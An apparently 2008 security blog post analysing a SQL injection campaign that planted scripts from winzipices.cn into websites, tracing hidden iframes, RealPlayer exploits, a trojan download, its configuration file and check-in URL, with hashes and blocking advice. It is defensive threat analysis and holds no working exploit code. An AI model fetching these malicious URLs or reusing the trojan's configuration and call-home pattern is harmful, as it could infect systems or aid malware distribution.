- 26.06.2008: FIRST Conference - Vancouver, Canada
- 24.06.2008: FIRST Conference - Vancouver, Canada
- 04.06.2008: AbuseSec08 Conference - Karlsruhe, Germany
- 27.05.2008: When Adobe Flash Attacks
- 23.05.2008: AUS-CERT Conference - Gold Coast, Australia
- 14.05.2008: Full list of Injected Sites
- 13.05.2008: SQL Injection: The Game
- 07.05.2008: See below.
- 24.04.2008: Thousands of More Hacked Websites Targeting Your Passwords
- 20.04.2008: Entropy and Bot Counts
- 10.04.2008: DSL Reports under DDoS Attack Again
Wednesday, 7 May 2008
New SQL Injection Attacks and New Malware: winzipices.cn
Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.
As predicted, the attacks against ASP and ASP.NET pages via SQL injection have continued. This time the domain name "winzipices.cn" is in the spotlight. It has managed to find itself in the source of over 4,000 pages according to Google. ISC has also has a short diary today mentioning this attack here. It turns out this is also something we have been taking a look at now for a few days. With that being said, we would like to share some information that can help protect end users and organizations.
It would appear that our attackers in this instance are taking advantage of the same issues we have discussed in some of our recent postings. However, we do know that the malware and malicious file trail here are different than the last few attacks. If your websites has been hacked or you are visiting a hacked website, you will find something like this in your HTML source in the page you visit:
It appears that 1.js, 2.js, 3.js, and 4.js are also present. Each of these files in turn have hidden iframes that we will discuss below.
The Malicious File Trail
Visiting a website injected with winzipices.cn followed by a link to either 1.js, 2.js, 3.js, 4.js, or 5.js results in the following set of requests:
hxxp://winzipices.cn/5.js writes a hidden iframe linking to hxxp://winzipices.cn/5.asp
hxxp://winzipices.cn/5.asp then writes two more hidden iframes:
hxxp://winzipices.cn/s.asp - appears to be an empty file
hxxp://winzipices.cn/pp.js - This file checks if your browser is either IE6 or IE7. If your browser's User-Agent is IE6 or IE7 it will attempt to send you to one of the two links via hidden iframes:
-hxxp://winzipices.cn/le.gif - Has a direct link to the malicious binary at hxxp://184.108.40.206/images/test.exe -hxxp://winzipices.cn/vv.js -hxxp://winzipices.cn/old.gif - Older RealPlayer Exploit in ierpplug.dll -hxxp://winzipices.cn/xin.gif - Recent RealPlayer exploit against CLSID 2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93
hxxp://winzipices.cn/7.gif - IE7 user are sent here and only receive two of the iframes the IE6 users receive:
-hxxp://winzipices.cn/old.gif - Older RealPlayer Exploit in ierpplug.dll -hxxp://winzipices.cn/xin.gif - Recent RealPlayer exploit against CLSID 2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93
It would appear that successful exploit attempts would result in a file called "test.exe" being download from 220.127.116.11. This just so happens to be the name of the file that was used in the recent attacks involving "nihaorr1.com". However, these are very different binaries.
Another Interesting Discovery
We also noted that requesting invalid files (404 requests) from this server will return two iframes.
hxxp://winzipices.cn/pp.htm - See above as we have already discussed this one
hxxp://winzipices.cn/test.htm - Not what you would expect. This page loads one of the following URL at random:
-hxxp://www.bsu.edu/web/nmmakridakis/images/lolret1.jpg - with alt tag "sex girl" -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret8.jpg - with alt tag "my wow account" -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret7.jpg - with alt tag "WOW UI" -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret5.jpg - with alt tag "oh god" -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret6.jpg - with alt tag "UI" -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret2.jpg - with alt tag "UI" -hxxp://www.bsu.edu/web/nmmakridakis/images/lolret3.jpg - with alt tag "UI"
These are all images of someone playing World of WarCraft. Not quite sure how this plays into everything or why it is there, but it is quite peculiar.
In the most recent attacks we blogged about, the malware installed a password stealer that would grab credentials from systems running Internet Explorer. This is definitely a different piece of malware from the previous attacks and does not appear the first executable is a password stealer. This binary that is download by this attack appears to be part of a kit we have seen in the Chinese malware family for some time now. The first thing this malware does once installed is download a configuration file. This configuration file has several commands and tells the system what to do next. In our instance it tell is to download yet another file and to report in to a URL.
The malware is download from hxxp://18.104.22.168/images/test.exe and then once installed makes the following requests back to winzipices.cn:
hxxp://winzipices.cn/config.txt - GET request for the configuration file
hxxp://winzipices.cn/1.exe - GET requests for a binary to download and execute
hxxp://winzipices.cn/tong/post.asp?anyehorse=COMPUTER_NAME - GET request to report in the system name
The configuration file for this malware looks like this:
Random: 3455* Down: hxx://winzipices.cn/1.exe* FlipWEB: * SendGet: hxxp://winzipices.cn/tong/post.asp* InfeWeb: * NetBiosInfe: 1* HDInfe: 0* InfeExe: 0* RemovInfe: 1* RemovableDrive: 1* FixedDrive: 1* ReadTime: 1* OpenSys: 1*
This is a malware family we have been seeing for some time now. This malware has several different capabilities through the above configuration file to include ARP spoofing to inject malicious code into webpages of users on the LAN.
The file 1.exe that is then installed from this trojan makes continuous outbound requests to 22.214.171.124 on port 1800.
File MD5: 8ca53bf2b7d8107d106da2da0f8ca700 (test.exe)
File Size: 28301 bytes
File MD5: 5c9322a95aaafbfabfaf225277867f5b (1.exe)
File Size: 38400 bytes
Protection & Detection
As always we recommend that you block access to the malicious domains and sites. Using a content filter, changing DNS entries, and blocking IP addresses are all valid methods. Of course being up-to-date on your patches can also go a long way. Here's a quick recap of the malicious sites/IP addresses involved in this attack:
Note that blocking by IP address could potentially block other legitimate pages on the host (not likely in this case). It's also generally only valid or helpful for a short period of time as attackers frequently change both IP addresses and domain names.
=>Posted May 07, 2008, at 05:34 AM by Steven Adair